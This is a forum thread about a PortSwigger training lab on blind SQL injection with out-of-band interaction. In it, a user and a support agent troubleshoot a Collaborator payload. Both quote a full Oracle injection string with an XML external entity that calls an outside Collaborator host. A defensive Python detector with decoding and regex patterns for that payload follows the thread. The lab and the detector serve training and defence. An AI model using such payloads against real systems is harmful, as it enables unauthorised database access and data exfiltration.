Burp Suite User Forum

Issues with 'Blind SQL injection with out-of-band interaction' Lab

Shervin | Last updated: Feb 02, 2022 09:36PM UTC

Hello PortSwigger Team, It seems that the recommended solution is not working correctly for me. I do currently have the professional edition of the Burp Suite and I am replacing the 'YOUR-COLLABORATOR-ID.burpcollaborator.net' portion of the injection string with the generated URL provided by the Burp Collaborator client feature; however, when I poll the Collaborator client for recent interactions, none show up. I am simply refreshing the main page of the lab website, intercepting the request, and concatenating the injection string with the value of the 'trackingId' cookie as directed in the solution, yet no DNS lookup appears to be triggered.

Ben, PortSwigger Agent | Last updated: Feb 03, 2022 09:00AM UTC

Hi Shervin, In the first instance, just to confirm that you have the requisite connectivity in place, if you perform a collaborator health check (via the Help -> Embedded browser health check menu item) are all of the tests succeeding? I have just run through this lab and was able to solve it using the solution provided so it does appear to be working as expected. Are you able to provide us with some details of the steps that you are taking to try and solve this (the payload that you are entering as part of the TrackingID cookie would be useful)? If it helps to provide screenshots of your process then please feel free to send these to us via email at support@portswigger.net.

Shervin | Last updated: Feb 03, 2022 03:06PM UTC

I sent a screenshot of the embedded browser health check results to the support email provided. All tests appear to be successful. Here's a sample payload that I've just tried as value for the 'TrackingId' cookie.

ORJXFYvqinVDE32z'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//rlgg7u7rcc18mizfgm85gb6spjvcj1.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Ben, PortSwigger Agent | Last updated: Feb 03, 2022 06:14PM UTC

Hi Shervin, Apologies - I have mistyped in my original answer. I meant for you to check the health of your connection to the public Collaborator server (this can be carried out via Project options -> Misc -> Burp Collaborator Server -> Run health check). Are you able to run this and just double check the connectivity is fine? Just to clarify, you are entering that particular payload in the form below i.e. you are appending the payload after TrackingID= :

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//YOUR-COLLABORATOR-ID.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Apologies once again for the confusion.

Shervin | Last updated: Feb 03, 2022 08:48PM UTC

Alright, it appears that utilizing the repeater and manually inserting the injection string in the request field as opposed to modifying the request cookie value from the Inspector sub-tab seems to do the trick. It appears that the string was being encoded in a particular way when I was utilizing the Inspector sub-tab. Also, the result of the health check for the default Burp Collaborator server was that all tests ran successfully except for the 'Server SMTP connection on port 25'. Anyways, shouldn't be a problem for now. Thanks for your help.
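
The encoding difference that resolved this thread also matters on the defensive side: a check that inspects the raw cookie value sees different bytes depending on how many encoding layers were applied. The following is an added example, not part of the original posts and not PortSwigger's code, that decodes a cookie value until it is stable and then looks for the markers of the payload quoted above. The function names, the marker list and the sample values are assumptions constructed for illustration, as is the premise that an extra layer means a second round of URL-encoding.

```python
import re
from urllib.parse import quote, unquote_plus

# Markers taken from the payload quoted in the thread (Oracle XML parsing with an external entity).
MARKERS = {
    "external_entity": re.compile(r"<!ENTITY\s+%?\s*\w+\s+SYSTEM\s+[\"']", re.I),
    "extractvalue_call": re.compile(r"extractvalue\s*\(", re.I),
    "union_select": re.compile(r"'\s*union\s+select\b", re.I),
    "xmltype_call": re.compile(r"xmltype\s*\(", re.I),
}

def decode_layers(value, max_layers=3):
    """URL-decode until the value stops changing; return (decoded, layers_removed)."""
    layers = 0
    while layers < max_layers:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers

def scan_cookie(value):
    """Report which markers appear once every encoding layer is removed."""
    decoded, layers = decode_layers(value)
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(decoded))
    # An external entity handed to xmltype() is what triggers the outbound lookup.
    suspicious = "external_entity" in hits and "xmltype_call" in hits
    return {"layers": layers, "hits": hits, "suspicious": suspicious}

# Constructed samples: a plain ID, the thread's payload shape, and the same value encoded once more.
BENIGN = "abc123XYZ"
SINGLE = (
    "x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f>"
    "<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"
    "\"http%3a//YOUR-COLLABORATOR-ID.burpcollaborator.net/\">+%25remote%3b]>'),'/l')+FROM+dual--"
)
DOUBLE = quote(SINGLE, safe="")

if __name__ == "__main__":
    for label, value in (("benign", BENIGN), ("single", SINGLE), ("double", DOUBLE)):
        print(label, scan_cookie(value))
```

A filter that matched only on the raw value would miss the doubly encoded sample, which is why the scan runs on the fully decoded form and reports the layer count alongside the hits.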
